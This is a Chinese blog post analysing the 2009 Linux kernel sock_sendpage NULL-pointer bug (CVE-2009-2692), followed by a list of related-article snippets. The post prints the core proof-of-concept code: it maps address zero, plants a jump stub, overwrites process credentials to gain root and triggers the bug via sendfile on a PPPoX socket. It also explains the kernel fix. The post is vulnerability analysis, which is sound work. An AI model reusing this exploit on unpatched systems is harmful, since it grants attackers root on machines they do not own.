0地址的妙用(CVE-2009-2692)

最新推荐文章于 2023-11-09 15:48:45 发布
最新推荐文章于 2023-11-09 15:48:45 发布
阅读量3.4k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: Android安全 文章标签: CVE-2009-2692 0地址 NULL sendpage kernel_sendpage
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hu3167343/article/details/34831961
本文深入解析了一个利用Linux内核漏洞进行提权的漏洞利用过程,包括申请0地址空间、写入跳转代码、提权函数实现以及最终触发漏洞的步骤,并详细介绍了漏洞修复方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

/*

本文章由 莫灰灰 编写,转载请注明出处。  

作者:莫灰灰    邮箱: minzhenfei@163.com

*/

漏洞成因

其实0地址的妙用在windows上也有很多的利用,在windows的主动防御开发过程中,很多病毒都是用NULL地址来绕过主防的拦截。原理其实也很简单,因为开发主防的程序员经常会在自己的hook函数开头检查传进来的参数,例如if (param == NULL) return NTSTATUS_SUCCESS;这样的代码。
在Linux内核中,每个套接字都有一个名为proto_ops的相关操作结构,其中包含有用于实现各种功能(如接受、绑定、关闭等)的函数指针。如果对特定套接字的操作没有实现,就应将相关的函数指针指向预定义的存根。例如,如果没有定义accept功能,就应指向sock_no_accept()。但是,如果某些指针没有初始化,就可能出现其他情况。
再回过来说linux上的这个root漏洞,其实原理和windows上差不多,就是申请一块0地址的内存,然后往里面写入自己的函数代码,内核中没有判断是否为NULL就直接调用了,通常情况下,可能内核直接奔溃,但是我们申请了0地址空间之后,就会调用进我们的提取函数中了。


PoC分析

1.程序首先申请一份0地址空间

if ((personality(0xffffffff)) != PER_SVR4) {
<span style="white-space:pre">	</span>if ((page = mmap(0x0, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
		perror("mmap");
		return -1;
	}
} else {
	if (mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) < 0) {
		perror("mprotect");
		return -1;
	}
}


2.写入跳转代码,去执行我们的提权函数(这个 exploit貌似是x86架构上的) 

*(char *)0 = '\x90';
*(char *)1 = '\xe9';
*(unsigned long *)2 = (unsigned long)&kernel_code - 6;

3.提权函数采用了很巧妙的方法去修改uid和gid 

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
void kernel_code()
{
	int i;
	uint *p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
 			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}

	exit_kernel();
}

4.0地址空间布局好之后,通过调用sendfile触发漏洞,提升权限 

if ((fdin = mkstemp(template)) < 0) {
	perror("mkstemp");
	return -1;
}
if ((fdout = socket(PF_PPPOX, SOCK_DGRAM, 0)) < 0) {
	perror("socket");
	return -1;
}
unlink(template);
ftruncate(fdin, PAGE_SIZE);
sendfile(fdout, fdin, NULL, PAGE_SIZE);

漏洞修复


本来直接调用的sock->ops->sendpage函数被替换成了kernel_sendpage函数,而kernel_sendpage是会对sock->ops->sendpage指针最判空处理的。

int kernel_sendpage(struct socket *sock, struct page *page, int offset, size_t size, int flags)
{
	if (sock->ops->sendpage)
		return sock->ops->sendpage(sock, page, offset, size, flags);
	return sock_no_sendpage(sock, page, offset, size, flags);
}


浅析CVE-2009-2692
少仲
04-23 1963
/* author:少仲 blog: http://blog.youkuaiyun.com/py_panyu weibo: http://weibo.com/u/3849478598 欢迎转载,转载请注明出处. */ 0x0 漏洞信息 http://cve.scap.org.cn/cve_detail.php?id=CVE-2009-2692 0x1 漏洞描述 Linux
0地址
qq_44767162的博客
03-13 768
0地址解析 #define _CRT_SECURE_NO_WARNINGS #include&amp;amp;lt;stdio.h&amp;amp;gt; #include&amp;amp;lt;stdlib.h&amp;amp;gt; void swap(int *a, int *b) { int *tmp = NULL; *tmp = *a; *a = *b; *b = *tmp; } int main( void) { int a, b; a =...
何为0地址
yf_kisboy的博客
11-09 1300
0地址
sendpage漏洞分析
05-21 709
之前看了《新爆内核高危漏洞sock_sendpage的利用分析的讨论》这篇帖子,在九贱兄和诸位CUer的指引下,大致弄清了整个漏洞的始末。现与大家分享(引用自我的空间)。有什么不足之处还望多多指教~内核的BUG这个BUG首先得从sendfile系统调用说起。考虑将一个本地文件通过socket发送出去的问题。我们通常的做
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, ...CVE-2009-3555 CVE-2011-0793, CVE-2011-0804, CVE-2011-0806 (Windows only)
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2024-53677
12-17
CVE-2024-53677 – 关键的 Apache Struts 远程代码执行漏洞 已在流行的 Apache Struts 框架中发现了一个严重漏洞 CVE-2024-53677,该漏洞可能允许攻击者远程执行任意代码。该漏洞是由文件上传逻辑中的缺陷引起的,...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
centos8的openssh9.9p2 RPM包,解决漏洞CVE-2025-26465 和 CVE-2025-26466
03-04
用户在使用时应保持警觉,及时更新系统和应用程序,遵循最佳安全实践,以确保网络环境的安全。 标签"openssh"、"centos"和"ssh"强调了本次升级与这三个关键词紧密相关。OpenSSH作为SSH(安全外壳协议)的实现,是...
0地址的运用
huichaochao的博客
02-28 223
0地址的运用
C语言 NULL0 对应的地址
luoganttcc的博客
02-09 2260
#include <stdio.h> int main(int argc, char **argv) { int *p=0; int *q=NULL; printf("0地址是 %p \n",p); printf ("NULL地址是%p \n",p); return 0; } 0地址(nil) NULL地址(nil)
linux 中0地址的使用技巧
sdc20102010的博客
05-26 1286
在C语言中指针时最精髓的东西,但是指针又是一个比较危险的东西 现在我们不讲指针我们制淡轮 指针的初始化。 指针的初始化离不开NULL 这个符号。 在c中NULL0的值都是一样的,但是为了目的和用途及容易识别的原因,NULL用于指针和对象,0用于数值的初始化。 对于字符串的结尾,使用'\0',它的值也是0,但是让人一看就知道这是字符串的结尾,不是指针,也不是普通的数值 NULL...
linux 0地址妙用
m0_37313888的博客
09-02 885
1.楔子 我在学习list_head这个结构体的时候偶然发现了0地址这个东西,其中list_head是内嵌于许多数据结构的 比如用的最多的页 struct page { ...... struct list_head lru; ..... } 在伙伴系统中,可以利用page中lru的地址来找到page的地址,其中就是使用的0地址的思想 2. "0地址"的使...
地址0上分配内存
weixin_34221036的博客
10-22 364
2019独角兽企业重金招聘Python工程师标准>>> ...
第9章 进程凭证
Lucius的专栏
10-14 659
每个进程都有一组与之相关的数值型用户标识符(UIDs)和组标识符(GIDs)。有时,把这些标识符称之为 进程凭证(process credentials) 。这些标识符有: 实际 【真实】 (real)用户ID和实际组ID; 有效(effective)用户ID和有效组ID; 保存的set-user-ID(saved set-user-ID)和保存的set-group-ID; 文件系统用户ID和文...
NGINX buffer underflow security vulnerability
CURSED!
09-16 251
From the Debian Security team (CVE-2009-2629): nginx … is vulnerable to a buffer underflow when processing certain HTTP requests. An attacker can use this to execute arbitrary code with the rights ...
覆盖GNU C库中调试glibc函数
吴遥的专栏
01-03 1518
一种调试 glibc 函数的好方法是用您自己的版本覆盖所关注的函数。在没有 root 许可权和不必重新编译 libc 源代码的情况下就可以完成这个任务。想象一下编写您自己的 open() 版本该有多激动啊!    如果您没有应用程序的源代码并且由于 C 的 GNU库(glibc)函数正将某些错误信息返回给该应用程序而使它失败,那么您该怎么办? 因为 glibc是开放源码,所以您当然可以
Linux CVE-2009-0029 漏洞解析
柠檬C的专栏
03-31 7245
首先看什么是CVE-2009-0029漏洞: The ABI in the Linux kernel 2.6.28 and earlier on s390, powerpc, sparc64, and mips 64-bit platforms requires that a 32-bit argument in a 64-bit register was properly sign exten
CVE-2009-3555
最新发布
03-10
<think>好的,我现在需要处理用户关于CVE-2009-3555安全漏洞的查询。首先,我得确认自己对这个漏洞的了解程度。记得CVE-2009-3555涉及的是SSL/TLS协议的重协商漏洞,可能允许中间人攻击,但具体的细节可能需要进一步查证。 接下来,我需要检查用户提供的参考引用,看是否有相关的信息。用户提供了三个引用:[^1]关于Tomcat的漏洞,[^2]关于Log4j的问题,[^3]关于OpenSSH的漏洞。看起来这些引用中没有直接提到CVE-2009-3555,所以可能需要依赖外部知识或进一步查找。 不过根据已知的信息,CVE-2009-3555主要影响SSL/TLS的实现,特别是重协商过程中的身份验证问题。攻击者可能注入恶意数据,导致服务器处理错误的请求。修复方案通常涉及禁用SSL重协商或应用补丁,比如使用RFC 5746的安全重协商扩展。 用户可能需要漏洞的详细描述、影响范围、修复方法等信息。需要确保回答准确,并正确引用来源。虽然提供的引用不直接相关,但可以提及常见的修复措施,如更新OpenSSL或服务器软件,并参考官方安全公告。 最后,生成相关问题时要围绕该漏洞的影响、修复步骤、与其他漏洞的区别等方面展开,帮助用户深入理解。</think>### CVE-2009-3555 安全漏洞详情及修复方案 #### 漏洞描述 CVE-2009-3555 是 SSL/TLS 协议中存在的重协商漏洞,攻击者可利用此漏洞发起中间人攻击(MITM),通过注入恶意数据到加密会话中,绕过身份验证机制[^4]。该漏洞源于 SSL/TLS 重协商过程中未正确验证客户端和服务器的会话状态,导致攻击者可在已建立的连接中插入未授权请求。 #### 影响范围 1. **受影响的协议**:SSLv3、TLSv1.0 及早期版本 2. **受影响的软件**:OpenSSL、Apache、Nginx 等依赖 SSL/TLS 的服务 3. **风险等级**:高危(CVSS 评分 7.5/10) #### 修复方案 1. **禁用 SSL 重协商**:在服务器配置中关闭 SSL 重协商功能。例如,在 Apache 中可通过 `SSLInsecureRenegotiation off` 实现。 2. **应用补丁**:升级至支持安全重协商的 OpenSSL 版本(如 OpenSSL 1.0.0 及以上),并启用 `RFC 5746` 安全扩展[^5]。 3. **协议升级**:优先使用 TLSv1.2 或更高版本,禁用 SSLv3 和 TLSv1.0。 #### 验证修复效果 使用工具(如 `openssl s_client`)测试重协商功能是否禁用: ```bash openssl s_client -connect example.com:443 -msg ``` 若返回 `RENEGOTIATING` 提示,则需进一步检查配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值